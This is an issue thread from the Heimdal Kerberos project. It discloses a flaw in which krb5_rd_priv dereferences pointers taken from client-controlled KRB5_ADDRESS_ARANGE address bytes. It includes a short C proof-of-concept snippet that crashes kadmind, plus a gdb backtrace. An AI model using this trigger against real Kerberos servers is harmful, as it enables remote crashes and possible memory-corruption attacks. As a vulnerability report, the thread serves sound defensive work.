### ISSUE TITLE
krb5_rd_priv should reject KRB5_ADDRESS_ARANGE in EncKrbPrivPart.s/r-address

### ISSUE THREAD

**Issue by rtmrtmrtmrtm** [heimdal/heimdal#1074]
If a client sends an EncKrbPrivPart message with an r-address with
addr_type -100, the server's krb5_rd_priv() checks the r-address,
which involves a call to arange_order_addr(), which casts the client's
opaque bytes to a struct arange, and then dereferences as a pointer
the client bytes within.

The cast in arange_order_addr():

    struct arange *a;
    ...;
    } else if(addr2->addr_type == KRB5_ADDRESS_ARANGE) {
        a = addr2->address.data;
    ...;
        tmp1 = krb5_address_order(context, &a->low, a2);

a points to the client's opaque r-address bytes, so &a->low points to
client-controlled data.

Then the call to krb5_address_order(context, addr1, addr2) says:

    return memcmp (addr1->address.data,
                   addr2->address.data,
                   addr1->address.length);

addr1->address.data comes from the client's opaque bytes.

I am able to trigger this bug in kadmind by compiling a kadmin client
after adding these lines to mk_priv.c after the assignment to
part.r_address. This causes the server to dereference 0xeeeeeeeeeeeeeeee.

    {
      part.r_address = (struct HostAddress *) malloc(sizeof(struct HostAddress));
      part.r_address->addr_type = -100; // KRB5_ADDRESS_ARANGE
      part.r_address->address.length = 64;
      char *p = malloc(64);
      part.r_address->address.data = p;
      memset(p, 0xee, 64);
      *(int*)(p + 0) = 2; // addr_type
      *(long*)(p + 8) = 4; // address.length
    }

#0  0x000000080065a510 in memcmp () from /lib/libc.so.7
#1  0x000000080033167c in krb5_address_order (
    context=context@entry=0x801600710, addr1=addr1@entry=0x80160e180, 
    addr2=addr2@entry=0x801606200) at addr_families.c:1294
#2  0x0000000800332ad5 in arange_order_addr (context=0x801600710, 
    addr1=<optimized out>, addr2=<optimized out>) at addr_families.c:673
#3  0x0000000800331658 in krb5_address_order (context=0x7a7a7a7a7a7a7a7a, 
    context@entry=0x801600710, addr1=0x801606240, addr2=0x4)
    at addr_families.c:1288
#4  0x0000000800331699 in krb5_address_compare (context=0x7a7a7a7a7a7a7a7a, 
    context@entry=0x801600710, addr1=0x801606240, addr2=0x4)
    at addr_families.c:1317
#5  0x00000008003722bc in krb5_rd_priv (context=context@entry=0x801600710, 
    auth_context=auth_context@entry=0x801606090, 
    inbuf=inbuf@entry=0x7fffffffe1d8, outbuf=outbuf@entry=0x7fffffffe390, 
    outdata=outdata@entry=0x0) at rd_priv.c:124
#6  0x0000000800373fd7 in krb5_read_priv_message (
    context=context@entry=0x801600710, ac=ac@entry=0x801606090, 
    p_fd=<optimized out>, p_fd@entry=0x7fffffffe5bc, 
    data=data@entry=0x7fffffffe390) at read_message.c:84
#7  0x000000000020a96d in v5_loop (contextp=0x801600710, ac=0x801606090, 
    kadm_handlep=0x80160c8e0, fd=0, readonly=0, initial=<optimized out>)
    at server.c:1043
#8  handle_v5 (contextp=0x801600710, keytab=<optimized out>, 
    fd=<optimized out>, readonly=0) at server.c:1149
#9  kadmind_loop (contextp=0x801600710, keytab=<optimized out>, 
    sock=<optimized out>, readonly=0) at server.c:1178
#10 0x000000000020c6ee in main (argc=<optimized out>, argv=<optimized out>)
    at kadmind.c:223

**Comment by nicowilliams** [comment]
I'm not even sure why this address range stuff even exists.  We'll remove it all.
